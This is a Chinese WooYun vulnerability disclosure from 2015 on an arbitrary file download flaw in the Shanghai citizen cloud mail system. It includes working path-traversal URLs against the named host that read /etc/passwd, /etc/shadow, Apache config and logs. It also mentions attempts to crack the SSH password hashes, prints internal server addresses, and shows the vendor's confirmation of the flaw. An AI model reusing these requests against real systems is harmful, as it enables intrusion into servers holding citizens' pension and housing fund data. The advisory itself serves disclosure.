当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0102553

漏洞标题:上海市民云信箱任意文件下载危害上海市养老保险公积金保险信息

相关厂商:上海市民云

漏洞作者: reglive

提交时间:2015-03-20 12:46

修复时间:2015-05-09 09:06

公开时间:2015-05-09 09:06

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-20: 细节已通知厂商并且等待厂商处理中
2015-03-25: 厂商已经确认,细节仅向厂商公开
2015-04-04: 细节向核心白帽子及相关领域专家公开
2015-04-14: 细节向普通白帽子公开
2015-04-24: 细节向实习白帽子公开
2015-05-09: 细节向公众公开

简要描述:

上海市民云信箱任意文件下载,直接可以获取服务器密码。该平台可以查询养老保险,公积金等信息.

详细说明:

问题出在之前的一个老域名上的系统上:http://mail.sh.cn/

http://mail.sh.cn/NewMailSh/smmail/jsp/Action/DownFile.jsp?file=/work/bea/citizenmail/NewMailSh/smmail/jsp/Action/DownFile.jsp&fileName=DownFile.jsp


httpd.conf
http://mail.sh.cn/NewMailSh/smmail/jsp/Action/DownFile.jsp?file=/usr/local/apache2/conf/httpd.conf&fileName=httpd.conf
passwd:
http://mail.sh.cn/NewMailSh/smmail/jsp/Action/DownFile.jsp?file=/etc/passwd&fileName=passwd
shadow
http://mail.sh.cn/NewMailSh/smmail/jsp/Action/DownFile.jsp?file=/etc/shadow&fileName=shadow
root权限啊,都能读shadow 文件,ssh账号看了一下,在cmd5上有2个可以收费破解,连了一下,发现22端口做了ip限制。
从httpd.conf 文件中可以获取到很多信息,日志文件和网站路径,域名配置信息等
http://mail.sh.cn/NewMailSh/smmail/jsp/Action/DownFile.jsp?file=/work/apachelogs/info.smmail.cn_access_log&fileName=info.smmail.cn_access_log
/work/apachelogs/www.smmail.cn_erro_log
/work/apachelogs/mail.sh.cn_erro_log
/work/apachelogs/mail.sh.cn_access_log
/work/apachelogs/www.smmail.cn_erro_log

<VirtualHost 218.78.214.31:80>
ServerAdmin Webmaster@smmail.cn
DocumentRoot "/work/bea/citizenmail/NewMailSh"
ServerName www.eshimin.com
<Directory "/work/bea/citizenmail/NewMailSh">
Options FollowSymlinks
DirectoryIndex index.htm index.jsp
</Directory>
<Location /wiki/>
<IfModule mod_weblogic.c>
WebLogicHost 10.10.9.216
WebLogicPort 7001
ConnectTimeoutSecs 10
MatchExpression *.jsp
MatchExpression *.do
</IfModule>
SetHandler weblogic-handler
PathTrim /
</Location>
</VirtualHost>
TraceEnable off


部分站点日志文件放在内网
泄露的信息太多,服务器安全受到威胁,最近比较忙,没时间继续测试了。

漏洞证明:

2.png


20150320122242.png


3620150320122435.png


httpd.conf.png

修复方案:

服务器应用权限配置,旧的系统淘汰掉

版权声明:转载请注明来源 reglive@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-03-25 09:04

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给上海分中心,由其后续协调网站管理单位处置。

最新状态:

暂无